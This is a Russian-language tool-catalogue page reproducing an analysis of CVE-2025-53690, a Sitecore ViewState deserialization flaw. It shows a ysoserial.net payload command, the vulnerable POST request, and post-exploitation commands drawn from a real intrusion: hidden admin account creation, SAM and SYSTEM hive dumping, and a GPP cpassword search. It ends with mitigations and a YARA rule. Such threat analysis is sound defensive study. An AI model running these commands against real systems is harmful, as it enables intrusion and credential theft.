Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-53690-Analysis — Это документы анализа CVE-2025-53690. | Kitploit
Инструменты/GitHubGitHub/m0d0ri205/cve-2025-53690-analysis
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийФорензикаАнализ вредоносных программТестирование на ПроникновениеОбучение и ОбразованиеRed TeamingРеагирование на Инциденты
GitHubm0d0ri205/cve-2025-53690-analysis

CVE-2025-53690-Analysis

Это документы анализа CVE-2025-53690.

341 год назадЕщё не проверено
Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-53690: Анализ уязвимости десериализации ViewState в Sitecore

Обзор

CVE-2025-53690 — это уязвимость десериализации ViewState, обнаруженная в семействе продуктов Sitecore, которая позволяет выполнить удаленный код, используя раскрытый machine key ASP.NET.

Основная информация

  • CVE ID: CVE-2025-53690
  • Оценка CVSS: 9.0 (Critical)
  • Тип уязвимости: Deserialization of Untrusted Data (CWE-502)
  • Дата обнаружения: Сентябрь 2025 г.
  • Дата публикации: 3 сентября 2025 г.
  • Реальная эксплуатация: Эксплуатируется как Zero-day с декабря 2024 г.

Затрагиваемые продукты

  • Sitecore Experience Manager (XM) — все версии 9.0 и ниже
  • Sitecore Experience Platform (XP) — все версии 9.0 и ниже
  • Sitecore Experience Commerce (XC)
  • Sitecore Managed Cloud
  • Модуль Active Directory версии 1.4 и ниже

Детальный анализ уязвимости

Коренная причина

В основе этой уязвимости лежит неправильное управление конфигурацией:

  1. Использование образцового Machine Key: Пример ASP.NET machine key из руководства по развертыванию Sitecore до 2017 года используется в производственной среде без изменений
  2. Повторное использование статического ключа: Один и тот же machine key используется многократно в различных развертываниях
  3. Обход проверки ViewState: Раскрытый ключ позволяет обойти проверку целостности ViewState

Механизм ViewState в ASP.NET

ViewState — это функция управления состоянием в ASP.NET, которая:

  • Сохраняет состояние веб-страницы в скрытом поле __VIEWSTATE
  • Использует machine key для обеспечения целостности и конфиденциальности
  • Сервер десериализует ViewState для восстановления состояния страницы
root@kitploit:~
<!-- Пример web.config -->
<system.web>
    <machineKey 
        validationKey="[64-байтовый ключ]"
        decryptionKey="[48-байтовый ключ]"
        validation="HMACSHA256" 
        decryption="AES" />
</system.web>

Векторы атаки

1. Определение уязвимой конечной точки

root@kitploit:~
Target: /sitecore/blocked.aspx
Method: POST
Особенности: Доступна без аутентификации, использует ViewState

2. Генерация вредоносной полезной нагрузки ViewState

Злоумышленник использует известный machine key и ysoserial.net для создания вредоносной полезной нагрузки:

root@kitploit:~
# Пример использования ysoserial.net
ysoserial.exe -f ViewState -g TypeConfuseDelegate -c "calc.exe" --validationkey="[ключ]" --validationalg="HMACSHA256" --decryptionkey="[ключ]" --decryptionalg="AES"

3. Отправка HTTP-запроса

root@kitploit:~
POST /sitecore/blocked.aspx HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

__VIEWSTATE=[вредоносная_полезная_нагрузка]&__VIEWSTATEGENERATOR=[значение]

Анализ реальных атак (отчет Mandiant)

Жизненный цикл атаки

Фаза 1: Начальное проникновение

  • Конечная точка: /sitecore/blocked.aspx
  • Метод: Атака десериализации ViewState
  • Привилегии: NETWORK SERVICE (рабочий процесс IIS)
  • Полезная нагрузка: Инструмент разведки WEEPSTEEL

Фаза 2: Разведка и создание плацдарма

root@kitploit:~
# Выполненные команды
whoami
hostname  
net user
tasklist
ipconfig /all
netstat -ano
net group "domain admins"

Развернутые инструменты:

  • 7za.exe: Инструмент для архивирования файлов
  • lfe.ico: Инструмент сетевого туннелирования EARTHWORM
  • 1.vbs: VBScript для выполнения команд

Фаза 3: Повышение привилегий

root@kitploit:~
# Создание учетной записи локального администратора
net user asp$ [пароль] /add
net localgroup administrators asp$ /add

net user sawadmin [пароль] /add  
net localgroup administrators sawadmin /add

Сбор учетных данных:

root@kitploit:~
reg save HKLM\SYSTEM c:\users\public\system.hive
reg save HKLM\SAM c:\users\public\sam.hive

Фаза 4: Обеспечение постоянства

  • Доступ по RDP: Использование созданных учетных записей администратора
  • DWAGENT: Установка инструмента удаленного доступа (регистрация службы с правами SYSTEM)
  • Изменение настроек учетной записи:
root@kitploit:~
net user [AdminUser] /passwordchg:no /expires:never
wmic useraccount where name='[AdminUser]' set PasswordExpires=False

Фаза 5: Внутренняя разведка

root@kitploit:~
# Определение контроллера домена
nltest /DCLIST:[domain]
nslookup [domain-controller]

# Поиск cpassword в GPO (атака на Group Policy Preferences)
findstr /S /l cpassword \\[DC]\sysvol\[domain]\policies\*.xml

# Запуск BloodHound/SharpHound
sh.exe -c all

Фаза 6: Горизонтальное перемещение

  • Доступ по RDP к другим системам с использованием скомпрометированных учетных записей доменных администраторов
  • Обход защиты с помощью сетевого туннелирования через EARTHWORM

Анализ используемых инструментов

WEEPSTEEL (инструмент разведки)

root@kitploit:~
// Собираемая информация
Information.BasicsInfo basicsInfo = new Information.BasicsInfo
{
    Directories = new Information.Directories
    {
        CurrentWebDirectory = HostingEnvironment.MapPath("~/")
    },
    OperatingSystemInformation = Information.GetOperatingSystemInformation(),
    DiskInformation = Information.GetDiskInformation(),
    NetworkAdapterInformation = Information.GetNetworkAdapterInformation(),
    Process = Information.GetProcessInformation()
};

Способ вывода: Скрытие данных под видом ViewState

root@kitploit:~
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" 
       value="/wEPDwUKLTcyODc4{AES шифрование + вывод в base64}" />

EARTHWORM (сетевое туннелирование)

  • Функциональность прокси-сервера SOCKS v5
  • Обход брандмауэра и скрытие трафика
  • Туннелирование RDP-трафика для обхода обнаружения

DWAGENT (удаленный доступ)

  • Легитимный инструмент удаленного администрирования
  • Регистрация службы с правами SYSTEM
  • Обеспечение постоянства через автозапуск

SHARPHOUND (разведка AD)

  • Инструмент сбора данных для BloodHound
  • Картографирование среды Active Directory
  • Определение путей атаки

Меры защиты и смягчения

Немедленные действия

root@kitploit:~
<!-- Создание уникального machine key -->
<machineKey 
    validationKey="[новый_64-байтовый_ключ]"
    decryptionKey="[новый_48-байтовый_ключ]"
    validation="HMACSHA256" 
    decryption="AES" />

Меры по усилению безопасности

  1. Автоматическая ротация ключей
  2. Включение проверки MAC для ViewState
  3. Шифрование конфигурационных файлов
  4. Сегментация сети
  5. Усиление мониторинга

Правила обнаружения

root@kitploit:~
# Пример YARA-правила (обнаружение WEEPSTEEL)
rule WEEPSTEEL_Detection {
    strings:
        $viewstate = "__VIEWSTATE"
        $crypto = "System.Security.Cryptography"
        $serializer = "JavaScriptSerializer"
    condition:
        all of them
}

Заключение

CVE-2025-53690 — это яркий пример того, как простая ошибка конфигурации может привести к критической угрозе безопасности. Изучая эту уязвимость, обучающиеся могут ознакомиться с полным жизненным циклом реальной APT-атаки и понять современные методы атак и стратегии защиты.

Справочные материалы

  • Google Cloud Blog - ViewState Deserialization Zero-Day
  • Sitecore Advisory SC2025-005
  • CISA KEV Catalog
  • ysoserial.net
  • Microsoft Security Blog - ASP.NET Machine Keys
Скачать инструмент